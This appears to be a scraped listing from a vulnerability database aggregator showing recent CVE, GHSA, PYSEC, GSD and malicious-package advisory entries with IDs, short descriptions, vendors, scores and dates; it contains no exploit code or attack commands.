Recent vulnerabilities

Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2025-7469 Campcodes Sales and Inventory System product_add.php s… Campcodes
 Sales and Inventory System
 2025-07-12T10:32:06.422Z 2025-07-12T10:32:06.422Z
cve-2025-7518 RSFirewall! <= 1.1.42 - Authenticated (Admin+) Arbitra… rsjoomla
 RSFirewall!
 2025-07-12T09:24:28.763Z 2025-07-12T09:24:28.763Z
cve-2020-36847 Simple File List < 4.2.3 - Remote Code Execution eemitch
 Simple File List
 2025-07-12T09:24:28.215Z 2025-07-12T09:24:28.215Z
cve-2025-7468 Tenda FH1201 HTTP POST Request fromSafeUrlFilter buffe… Tenda
 FH1201
 2025-07-12T09:02:06.642Z 2025-07-12T09:02:06.642Z
cve-2025-7467 code-projects Modern Bag product-detail.php sql injection code-projects
 Modern Bag
 2025-07-12T08:32:06.032Z 2025-07-12T08:32:06.032Z
cve-2025-7504 Friends 3.5.1 - Authenticated (Subscriber+) PHP Object… akirk
 Friends
 2025-07-12T08:23:42.188Z 2025-07-12T08:23:42.188Z
cve-2025-7466 1000projects ABC Courier Management add_dealerrequest.… 1000projects
 ABC Courier Management
 2025-07-12T08:02:05.310Z 2025-07-12T08:02:05.310Z
cve-2025-6423 BeeTeam368 Extensions <= 2.3.5 - Authenticated (Subscr… beeteam368
 BeeTeam368 Extensions
 2025-07-12T07:24:24.664Z 2025-07-12T07:24:24.664Z
cve-2025-7465 Tenda FH1201 HTTP POST Request fromRouteStatic buffer … Tenda
 FH1201
 2025-07-12T07:02:07.562Z 2025-07-12T07:02:07.562Z
cve-2025-7464 osrg GoBGP rtr.go SplitRTR out-of-bounds osrg
 GoBGP
 2025-07-12T06:32:06.030Z 2025-07-12T06:32:06.030Z
cve-2025-7463 Tenda FH1201 HTTP POST Request AdvSetWrlsafeset formWr… Tenda
 FH1201
 2025-07-12T06:02:06.537Z 2025-07-12T06:02:06.537Z
cve-2025-7462 Artifex GhostPDL New Output File Open Error gdevpdf.c … Artifex
 GhostPDL
 2025-07-12T05:32:09.177Z 2025-07-12T05:32:09.177Z
cve-2025-1313 Nokri - Job Board WordPress Theme <= 1.6.3 - Authentic… scriptsbundle
 Nokri – Job Board WordPress Theme
 2025-07-12T05:30:11.949Z 2025-07-12T05:30:11.949Z
cve-2025-7461 code-projects Modern Bag action.php sql injection code-projects
 Modern Bag
 2025-07-12T04:32:06.241Z 2025-07-12T04:32:06.241Z
cve-2025-6057 WPBookit <= 1.0.4 - Authenticated (Subscriber+) Arbitr… iqonicdesign
 WPBookit
 2025-07-12T04:22:22.035Z 2025-07-12T04:22:22.035Z
cve-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload iqonicdesign
 WPBookit
 2025-07-12T04:22:21.429Z 2025-07-12T04:22:21.429Z
cve-2025-7029 N/A SMM Arbitrary Write via Unchecked OcHeader Buffer in P… GIGABYTE
 UEFI-OverClockSmiHandler
 2025-07-11T15:22:12.577Z 2025-07-12T03:55:17.202Z
cve-2025-7027 N/A SMM Arbitrary Write via Dual-Controlled Pointers in Co… GIGABYTE
 UEFI-GenericComponentSmmEntry
 2025-07-11T15:24:26.568Z 2025-07-12T03:55:16.358Z
cve-2025-7026 N/A SMM Arbitrary Write via Unchecked RBX Pointer in CommandRcx0 GIGABYTE
 UEFI-GenericComponentSmmEntry
 2025-07-11T15:27:34.960Z 2025-07-12T03:55:15.583Z
cve-2025-52988 6.7 (v3.1) 8.4 (v4.0) Junos OS and Junos OS Evolved: Privilege escalation to… Juniper Networks
 Junos OS
 2025-07-11T15:11:24.991Z 2025-07-12T03:55:14.636Z
cve-2025-52983 7.2 (v3.1) 8.6 (v4.0) Junos OS: After removing ssh public key authentication… Juniper Networks
 Junos OS
 2025-07-11T15:09:18.207Z 2025-07-12T03:55:13.796Z
cve-2025-52950 9.6 (v3.1) 6.4 (v4.0) Juniper Security Director: Insufficient authorization … Juniper Networks
 Juniper Security Director
 2025-07-11T14:40:49.980Z 2025-07-12T03:55:12.120Z
cve-2025-30661 7.3 (v3.1) 8.5 (v4.0) Junos OS: Low-privileged user can cause script to run … Juniper Networks
 Junos OS
 2025-07-11T14:38:52.289Z 2025-07-12T03:55:12.892Z
cve-2025-52954 7.8 (v3.1) 8.5 (v4.0) Junos OS Evolved: A low-privileged user can execute ar… Juniper Networks
 Junos OS Evolved
 2025-07-11T14:42:02.013Z 2025-07-12T03:55:11.283Z
cve-2023-39339 A vulnerability exists on all versions of Ivanti … Ivanti
 Policy Secure
 2025-07-12T03:31:11.142Z 2025-07-12T03:31:11.142Z
cve-2025-24294 N/A The attack vector is a potential Denial of Servic… Ruby
 resolv
 2025-07-12T03:30:40.226Z 2025-07-12T03:30:40.226Z
cve-2024-38648 A hardcoded secret in Ivanti DSM before 2024.2 al… Ivanti
 DSM
 2025-07-12T03:30:40.276Z 2025-07-12T03:30:40.276Z
cve-2023-39338 Enables an authenticated user (enrolled device) t… Ivanti
 Sentry
 2025-07-12T03:30:40.285Z 2025-07-12T03:30:40.285Z
cve-2023-38036 N/A A security vulnerability within Ivanti Avalanche … Ivanti
 Avalanche
 2025-07-12T03:30:40.265Z 2025-07-12T03:30:40.265Z
cve-2025-53871 N/A {'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-07-12T02:55:09.295Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]} N/A N/A 2025-07-12T02:55:09.295Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2025-7469 Campcodes Sales and Inventory System product_add.php s… Campcodes
 Sales and Inventory System
 2025-07-12T10:32:06.422Z 2025-07-12T10:32:06.422Z
cve-2025-7518 RSFirewall! <= 1.1.42 - Authenticated (Admin+) Arbitra… rsjoomla
 RSFirewall!
 2025-07-12T09:24:28.763Z 2025-07-12T09:24:28.763Z
cve-2020-36847 Simple File List < 4.2.3 - Remote Code Execution eemitch
 Simple File List
 2025-07-12T09:24:28.215Z 2025-07-12T09:24:28.215Z
cve-2025-7504 Friends 3.5.1 - Authenticated (Subscriber+) PHP Object… akirk
 Friends
 2025-07-12T08:23:42.188Z 2025-07-12T08:23:42.188Z
cve-2025-7468 Tenda FH1201 HTTP POST Request fromSafeUrlFilter buffe… Tenda
 FH1201
 2025-07-12T09:02:06.642Z 2025-07-12T09:02:06.642Z
cve-2025-7467 code-projects Modern Bag product-detail.php sql injection code-projects
 Modern Bag
 2025-07-12T08:32:06.032Z 2025-07-12T08:32:06.032Z
cve-2025-7466 1000projects ABC Courier Management add_dealerrequest.… 1000projects
 ABC Courier Management
 2025-07-12T08:02:05.310Z 2025-07-12T08:02:05.310Z
cve-2025-6423 BeeTeam368 Extensions <= 2.3.5 - Authenticated (Subscr… beeteam368
 BeeTeam368 Extensions
 2025-07-12T07:24:24.664Z 2025-07-12T07:24:24.664Z
cve-2025-7465 Tenda FH1201 HTTP POST Request fromRouteStatic buffer … Tenda
 FH1201
 2025-07-12T07:02:07.562Z 2025-07-12T07:02:07.562Z
cve-2025-7464 osrg GoBGP rtr.go SplitRTR out-of-bounds osrg
 GoBGP
 2025-07-12T06:32:06.030Z 2025-07-12T06:32:06.030Z
cve-2025-7463 Tenda FH1201 HTTP POST Request AdvSetWrlsafeset formWr… Tenda
 FH1201
 2025-07-12T06:02:06.537Z 2025-07-12T06:02:06.537Z
cve-2025-7462 Artifex GhostPDL New Output File Open Error gdevpdf.c … Artifex
 GhostPDL
 2025-07-12T05:32:09.177Z 2025-07-12T05:32:09.177Z
cve-2025-1313 Nokri - Job Board WordPress Theme <= 1.6.3 - Authentic… scriptsbundle
 Nokri – Job Board WordPress Theme
 2025-07-12T05:30:11.949Z 2025-07-12T05:30:11.949Z
cve-2025-7461 code-projects Modern Bag action.php sql injection code-projects
 Modern Bag
 2025-07-12T04:32:06.241Z 2025-07-12T04:32:06.241Z
cve-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload iqonicdesign
 WPBookit
 2025-07-12T04:22:21.429Z 2025-07-12T04:22:21.429Z
cve-2025-6057 WPBookit <= 1.0.4 - Authenticated (Subscriber+) Arbitr… iqonicdesign
 WPBookit
 2025-07-12T04:22:22.035Z 2025-07-12T04:22:22.035Z
cve-2025-24294 N/A The attack vector is a potential Denial of Servic… Ruby
 resolv
 2025-07-12T03:30:40.226Z 2025-07-12T03:30:40.226Z
cve-2024-38648 A hardcoded secret in Ivanti DSM before 2024.2 al… Ivanti
 DSM
 2025-07-12T03:30:40.276Z 2025-07-12T03:30:40.276Z
cve-2023-39339 A vulnerability exists on all versions of Ivanti … Ivanti
 Policy Secure
 2025-07-12T03:31:11.142Z 2025-07-12T03:31:11.142Z
cve-2023-39338 Enables an authenticated user (enrolled device) t… Ivanti
 Sentry
 2025-07-12T03:30:40.285Z 2025-07-12T03:30:40.285Z
cve-2023-38036 N/A A security vulnerability within Ivanti Avalanche … Ivanti
 Avalanche
 2025-07-12T03:30:40.265Z 2025-07-12T03:30:40.265Z
cve-2025-53879 N/A {'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-07-12T02:55:05.572Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]} N/A N/A 2025-07-12T02:55:05.572Z
cve-2025-53878 N/A {'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-07-12T02:55:06.063Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]} N/A N/A 2025-07-12T02:55:06.063Z
cve-2025-53877 N/A {'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-07-12T02:55:06.506Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]} N/A N/A 2025-07-12T02:55:06.506Z
cve-2025-53876 N/A {'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-07-12T02:55:06.948Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]} N/A N/A 2025-07-12T02:55:06.948Z
cve-2025-53875 N/A {'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-07-12T02:55:07.395Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]} N/A N/A 2025-07-12T02:55:07.395Z
cve-2025-53874 N/A {'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-07-12T02:55:07.881Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]} N/A N/A 2025-07-12T02:55:07.881Z
cve-2025-53873 N/A {'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-07-12T02:55:08.337Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]} N/A N/A 2025-07-12T02:55:08.337Z
cve-2025-53872 N/A {'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-07-12T02:55:08.811Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]} N/A N/A 2025-07-12T02:55:08.811Z
cve-2025-53871 N/A {'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-07-12T02:55:09.295Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]} N/A N/A 2025-07-12T02:55:09.295Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
fkie_cve-2025-7504 The Friends plugin for WordPress is vulnerable to PHP Object Injection in version 3.5.1 via deseria… 2025-07-12T09:15:26.187 2025-07-12T09:15:26.187
fkie_cve-2025-7468 A vulnerability has been found in Tenda FH1201 1.2.0.14 and classified as critical. This vulnerabil… 2025-07-12T09:15:25.950 2025-07-12T09:15:25.950
fkie_cve-2025-7467 A vulnerability, which was classified as critical, was found in code-projects Modern Bag 1.0. This … 2025-07-12T09:15:25.187 2025-07-12T09:15:25.187
fkie_cve-2025-7466 A vulnerability, which was classified as critical, has been found in 1000projects ABC Courier Manag… 2025-07-12T08:15:24.440 2025-07-12T08:15:24.440
fkie_cve-2025-6423 The BeeTeam368 Extensions plugin for WordPress is vulnerable to arbitrary file uploads due to missi… 2025-07-12T08:15:23.367 2025-07-12T08:15:23.367
fkie_cve-2025-7465 A vulnerability classified as critical was found in Tenda FH1201 1.2.0.14. Affected by this vulnera… 2025-07-12T07:15:23.240 2025-07-12T07:15:23.240
fkie_cve-2025-7464 A vulnerability classified as problematic has been found in osrg GoBGP up to 3.37.0. Affected is th… 2025-07-12T07:15:22.950 2025-07-12T07:15:22.950
fkie_cve-2025-7463 A vulnerability was found in Tenda FH1201 1.2.0.14. It has been declared as critical. This vulnerab… 2025-07-12T06:15:21.430 2025-07-12T06:15:21.430
fkie_cve-2025-7462 A vulnerability was found in Artifex GhostPDL up to 3989415a5b8e99b9d1b87cc9902bde9b7cdea145. It ha… 2025-07-12T06:15:21.200 2025-07-12T06:15:21.200
fkie_cve-2025-1313 The Nokri - Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via… 2025-07-12T06:15:20.820 2025-07-12T06:15:20.820
fkie_cve-2025-7461 A vulnerability was found in code-projects Modern Bag 1.0 and classified as critical. Affected by t… 2025-07-12T05:15:22.540 2025-07-12T05:15:22.540
fkie_cve-2025-6058 The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type … 2025-07-12T05:15:22.387 2025-07-12T05:15:22.387
fkie_cve-2025-6057 The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type … 2025-07-12T05:15:21.223 2025-07-12T05:15:21.223
fkie_cve-2025-24294 The attack vector is a potential Denial of Service (DoS). The vulnerability is caused by an insuffi… 2025-07-12T04:15:46.683 2025-07-12T04:15:46.683
fkie_cve-2024-38648 A hardcoded secret in Ivanti DSM before 2024.2 allows an authenticated attacker on an adjacent netw… 2025-07-12T04:15:46.313 2025-07-12T04:15:46.313
fkie_cve-2023-39339 A vulnerability exists on all versions of Ivanti Policy Secure below 22.6R1 where an authenticated … 2025-07-12T04:15:46.107 2025-07-12T04:15:46.107
fkie_cve-2023-39338 Enables an authenticated user (enrolled device) to access a service protected by Sentry even if the… 2025-07-12T04:15:45.777 2025-07-12T04:15:45.777
fkie_cve-2023-38036 A security vulnerability within Ivanti Avalanche Manager before version 6.4.1 may allow an unauthen… 2025-07-12T04:15:27.163 2025-07-12T04:15:27.163
fkie_cve-2025-53879 Rejected reason: Not used 2025-07-12T03:15:21.570 2025-07-12T03:15:21.570
fkie_cve-2025-53878 Rejected reason: Not used 2025-07-12T03:15:21.510 2025-07-12T03:15:21.510
fkie_cve-2025-53877 Rejected reason: Not used 2025-07-12T03:15:21.447 2025-07-12T03:15:21.447
fkie_cve-2025-53876 Rejected reason: Not used 2025-07-12T03:15:21.390 2025-07-12T03:15:21.390
fkie_cve-2025-53875 Rejected reason: Not used 2025-07-12T03:15:21.323 2025-07-12T03:15:21.323
fkie_cve-2025-53874 Rejected reason: Not used 2025-07-12T03:15:21.260 2025-07-12T03:15:21.260
fkie_cve-2025-53873 Rejected reason: Not used 2025-07-12T03:15:21.207 2025-07-12T03:15:21.207
fkie_cve-2025-53872 Rejected reason: Not used 2025-07-12T03:15:21.133 2025-07-12T03:15:21.133
fkie_cve-2025-53871 Rejected reason: Not used 2025-07-12T03:15:20.590 2025-07-12T03:15:20.590
fkie_cve-2025-5777 Insufficient input validation leading to memory overread when the NetScaler is configured as a Gate… 2025-06-17T13:15:21.523 2025-07-12T01:15:22.160
fkie_cve-2024-22151 Missing Authorization vulnerability in Codection Import and export users and customers.This issue a… 2024-06-08T17:15:42.420 2025-07-12T00:56:53.870
fkie_cve-2024-37070 IBM Concert Software 1.0.0, 1.0.1, 1.0.2, and 1.0.2.1 could allow an authenticated user to obtain s… 2024-11-19T20:15:30.693 2025-07-12T00:53:30.917
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ghsa-25gv-jrjg-43pj A vulnerability was found in Campcodes Sales and Inventory System 1.0. It has been classified as cr… 2025-07-12T12:30:20Z 2025-07-12T12:30:20Z
ghsa-fq9g-vv96-g2vc A vulnerability, which was classified as critical, was found in code-projects Modern Bag 1.0. This … 2025-07-12T09:30:31Z 2025-07-12T09:30:31Z
ghsa-56rg-32wr-38cm A vulnerability has been found in Tenda FH1201 1.2.0.14 and classified as critical. This vulnerabil… 2025-07-12T09:30:31Z 2025-07-12T09:30:31Z
ghsa-4fh8-fjgg-4q2v The Friends plugin for WordPress is vulnerable to PHP Object Injection in version 3.5.1 via deseria… 2025-07-12T09:30:31Z 2025-07-12T09:30:31Z
ghsa-vwjp-r23f-3f37 A vulnerability classified as problematic has been found in osrg GoBGP up to 3.37.0. Affected is th… 2025-07-12T09:30:30Z 2025-07-12T09:30:30Z
ghsa-qqx8-c7mj-52mh The BeeTeam368 Extensions plugin for WordPress is vulnerable to arbitrary file uploads due to missi… 2025-07-12T09:30:30Z 2025-07-12T09:30:30Z
ghsa-g7jg-vxf2-648c A vulnerability classified as critical was found in Tenda FH1201 1.2.0.14. Affected by this vulnera… 2025-07-12T09:30:30Z 2025-07-12T09:30:30Z
ghsa-2f6j-4278-g35p A vulnerability, which was classified as critical, has been found in 1000projects ABC Courier Manag… 2025-07-12T09:30:30Z 2025-07-12T09:30:30Z
ghsa-mghx-6f4q-jcrv The Nokri - Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via… 2025-07-12T06:30:23Z 2025-07-12T06:30:23Z
ghsa-hf2c-wp2p-xqr9 A vulnerability was found in Artifex GhostPDL up to 3989415a5b8e99b9d1b87cc9902bde9b7cdea145. It ha… 2025-07-12T06:30:23Z 2025-07-12T06:30:23Z
ghsa-f7v2-34w5-rp4f A vulnerability was found in Tenda FH1201 1.2.0.14. It has been declared as critical. This vulnerab… 2025-07-12T06:30:23Z 2025-07-12T06:30:23Z
ghsa-7jcv-9pmx-59g2 A vulnerability was found in code-projects Modern Bag 1.0 and classified as critical. Affected by t… 2025-07-12T06:30:23Z 2025-07-12T06:30:23Z
ghsa-68fc-7cx8-5rmc The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type … 2025-07-12T06:30:23Z 2025-07-12T06:30:23Z
ghsa-3554-wwhq-78h4 The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type … 2025-07-12T06:30:23Z 2025-07-12T06:30:23Z
ghsa-whgg-c8ff-264h A vulnerability exists on all versions of Ivanti Policy Secure below 22.6R1 where an authenticated … 2025-07-12T06:30:22Z 2025-07-12T06:30:22Z
ghsa-rmcg-3298-c99g A security vulnerability within Ivanti Avalanche Manager before version 6.4.1 may allow an unauthen… 2025-07-12T06:30:22Z 2025-07-12T06:30:22Z
ghsa-94xh-prxv-w7r3 Enables an authenticated user (enrolled device) to access a service protected by Sentry even if the… 2025-07-12T06:30:22Z 2025-07-12T06:30:22Z
ghsa-8vv2-mwjj-9vr6 A hardcoded secret in Ivanti DSM before 2024.2 allows an authenticated attacker on an adjacent netw… 2025-07-12T06:30:22Z 2025-07-12T06:30:22Z
ghsa-q7fp-768h-f255 Rejected reason: Not used 2025-07-12T03:30:20Z 2025-07-12T03:30:20Z
ghsa-hv67-cj9h-2798 Rejected reason: Not used 2025-07-12T03:30:20Z 2025-07-12T03:30:20Z
ghsa-f44q-pqw8-vmcf Rejected reason: Not used 2025-07-12T03:30:20Z 2025-07-12T03:30:20Z
ghsa-6vf8-jwjq-h6x6 Rejected reason: Not used 2025-07-12T03:30:20Z 2025-07-12T03:30:20Z
ghsa-6r3p-w2xm-3gqx Rejected reason: Not used 2025-07-12T03:30:20Z 2025-07-12T03:30:20Z
ghsa-5rxw-qq5w-mwpp Rejected reason: Not used 2025-07-12T03:30:20Z 2025-07-12T03:30:20Z
ghsa-57mq-cq9r-9vrh Rejected reason: Not used 2025-07-12T03:30:20Z 2025-07-12T03:30:20Z
ghsa-3qw7-pprw-qgj4 Rejected reason: Not used 2025-07-12T03:30:20Z 2025-07-12T03:30:20Z
ghsa-2ghp-ghc5-jw25 Rejected reason: Not used 2025-07-12T03:30:20Z 2025-07-12T03:30:20Z
ghsa-29vj-j5w5-pcph Insufficient input validation leading to memory overread on the NetScaler Management Interface NetS… 2025-06-17T15:31:08Z 2025-07-12T03:30:20Z
ghsa-j288-q9x7-2f5v Apache Commons Lang is vulnerable to Uncontrolled Recursion when processing long inputs 2025-07-11T15:31:37Z 2025-07-12T00:48:03Z
ghsa-xgh4-wmvj-9mvr A vulnerability has been found in TOTOLINK T6 4.1.5cu.748_B20211015 and classified as critical. Aff… 2025-07-12T00:30:53Z 2025-07-12T00:30:53Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Package Published Updated
pysec-2024-253 pretix before 2024.1.1 mishandles file validation. pretix 2024-02-26T16:28:00+00:00 2025-06-11T15:23:51.683422+00:00
pysec-2024-252 PyTorch before v2.2.0 was discovered to contain a heap buffer overflow vulnerability in t… torch 2024-04-17T19:15:07+00:00 2025-06-10T19:22:08.948962+00:00
pysec-2024-251 Pytorch before version v2.2.0 was discovered to contain a use-after-free vulnerability in… torch 2024-04-17T19:15:07+00:00 2025-06-10T03:12:59.077932+00:00
pysec-2025-47 An issue was discovered in Django 5.2 before 5.2.2, 5.1 before 5.1.10, and 4.2 before 4.2… django 2025-06-05T03:15:25+00:00 2025-06-05T05:23:28.296596+00:00
pysec-2025-46 A vulnerability was found in erdogant pypickle up to 1.1.5. It has been classified as cri… pypickle 2025-05-26T08:15:19+00:00 2025-06-03T17:36:58.579358+00:00
pysec-2025-45 A vulnerability was found in erdogant pypickle up to 1.1.5 and classified as problematic.… pypickle 2025-05-26T07:15:26+00:00 2025-06-03T17:36:58.528116+00:00
pysec-2024-250 Pytorch before v2.2.0 has an Out-of-bounds Read vulnerability via the component torch/csr… torch 2024-04-19T21:15:08+00:00 2025-06-03T15:23:56.072490+00:00
pysec-2023-312 Redis before 6cbea7d allows a replica to cause an assertion failure in a primary server b… redis 2023-07-15T23:15:09Z 2025-06-02T11:48:06.372423Z
pysec-2025-44 django-helpdesk before 1.0.0 allows Sensitive Data Exposure because of os.umask(0) in mod… django-helpdesk 2025-05-31T01:15:19+00:00 2025-05-31T03:09:35.357757+00:00
pysec-2025-43 vLLM is an inference and serving engine for large language models (LLMs). In versions sta… vllm 2025-05-29T17:15:21+00:00 2025-05-29T19:21:01.611587+00:00
pysec-2025-42 vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Ver… vllm 2025-04-30T01:15:51+00:00 2025-05-28T21:23:12.396609+00:00
pysec-2025-41 PyTorch is a Python package that provides tensor computation with strong GPU acceleration… torch 2025-04-18T16:15:23+00:00 2025-05-28T15:23:37.843138+00:00
pysec-2025-40 A vulnerability in the `preprocess_string()` function of the `transformers.testing_utils`… transformers 2025-05-19T12:15:19+00:00 2025-05-21T19:22:10.801823+00:00
pysec-2024-249 ### Summary On all Label Studio versions prior to 1.11.0, data imported via file upload f… label-studio 2024-02-22T22:15:47+00:00 2025-05-19T11:22:35.312280+00:00
pysec-2024-248 OpenCanary, a multi-protocol network honeypot, directly executed commands taken from its … opencanary 2024-10-14T21:15:12+00:00 2025-05-16T14:23:05.150356+00:00
pysec-2025-39 motionEye is an online interface for the software motion, a video surveillance program wi… motioneye 2025-05-14T16:15:29+00:00 2025-05-14T17:22:51.050788+00:00
pysec-2025-38 OpenStack Ironic before 29.0.1 can write unintended files to a target node disk during im… ironic 2025-05-08T17:16:01Z 2025-05-13T04:24:03.083929Z
pysec-2024-247 A directory traversal vulnerability exists in the zenml-io/zenml repository, specifically… zenml 2024-04-16T00:15:11+00:00 2025-05-12T15:23:53.861001+00:00
pysec-2025-37 An issue was discovered in Django 4.2 before 4.2.21, 5.1 before 5.1.9, and 5.2 before 5.2… django 2025-05-08T04:17:18+00:00 2025-05-08T05:23:16.210893+00:00
pysec-2025-36 Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/valida… langflow 2025-04-07T15:15:44+00:00 2025-05-07T19:22:44.993642+00:00
pysec-2024-246 Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. Starting in… vyper 2024-04-25T17:15:50+00:00 2025-05-05T19:21:20.899426+00:00
pysec-2024-111 A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langcha… langchain 2024-10-29T13:15:00Z 2025-05-02T18:39:47.588215Z
pysec-2024-245 Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated user… apache-airflow 2024-02-29T11:15:08+00:00 2025-05-01T21:22:38.598048+00:00
pysec-2025-35 Weblate is a web based localization tool. Prior to version 5.11, when creating a new comp… weblate 2025-04-15T21:16:04+00:00 2025-04-30T17:22:51.467257+00:00
pysec-2025-34 The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_… picklescan 2025-04-24T01:15:49+00:00 2025-04-24T03:08:15.436691+00:00
pysec-2025-33 Vyper is a Pythonic Smart Contract Language for the EVM. When the Vyper Compiler uses the… vyper 2025-01-14T18:16:05+00:00 2025-04-23T21:23:01.322686+00:00
pysec-2025-32 BentoML is a Python library for building online serving systems optimized for AI apps and… bentoml 2025-04-09T16:15:25+00:00 2025-04-22T19:21:34.073355+00:00
pysec-2025-31 vyper is a Pythonic Smart Contract Language for the EVM. Vyper handles AugAssign statemen… vyper 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.116292+00:00
pysec-2025-30 vyper is a Pythonic Smart Contract Language for the EVM. Multiple evaluation of a single … vyper 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.064106+00:00
pysec-2025-29 vyper is a Pythonic Smart Contract Language for the EVM. Vyper `sqrt()` builtin uses the … vyper 2025-02-21T22:15:13+00:00 2025-04-09T17:27:28.005382+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-33881 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33880 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33879 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33878 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33877 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33876 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33875 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33874 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33873 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33872 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33871 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33870 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33869 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33868 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33867 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33866 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33865 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33864 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33863 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33862 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33861 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33860 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33859 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33858 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33857 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33856 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33855 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33854 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33853 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33852 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
mal-2024-1264 Malicious code in trip-component-platform-online-usp (npm) 2024-04-15T06:22:03Z 2024-04-15T06:22:08Z
mal-2024-1261 Malicious code in trip-component-platform-online-goto (npm) 2024-04-15T06:22:03Z 2024-04-15T06:22:08Z
mal-2024-1260 Malicious code in trip-component-platform-online-footer (npm) 2024-04-15T06:22:03Z 2024-04-15T06:22:08Z
mal-2024-1265 Malicious code in viiiivek (npm) 2024-04-15T06:22:03Z 2024-04-15T06:22:04Z
mal-2024-1263 Malicious code in trip-component-platform-online-prepermission-popup (npm) 2024-04-15T06:22:03Z 2024-04-15T06:22:04Z
mal-2024-1262 Malicious code in trip-component-platform-online-header (npm) 2024-04-15T06:22:03Z 2024-04-15T06:22:04Z
mal-2024-1259 Malicious code in trip-component-platform-online-cookie-banner (npm) 2024-04-15T06:22:03Z 2024-04-15T06:22:04Z
mal-2024-1258 Malicious code in heroicons1 (npm) 2024-04-15T06:22:03Z 2024-04-15T06:22:04Z
mal-2024-1256 Malicious code in discourse-i18n (npm) 2024-04-15T06:22:03Z 2024-04-15T06:22:04Z
mal-2024-1255 Malicious code in deprecation-silencer (npm) 2024-04-15T06:22:03Z 2024-04-15T06:22:04Z
mal-2024-1257 Malicious code in discourse-markdown-it (npm) 2024-04-15T06:22:03Z 2024-04-15T06:22:03Z
mal-2024-1266 Malicious code in wt-fe-buz-utilities-collection (npm) 2024-04-15T05:55:37Z 2024-04-15T05:55:37Z
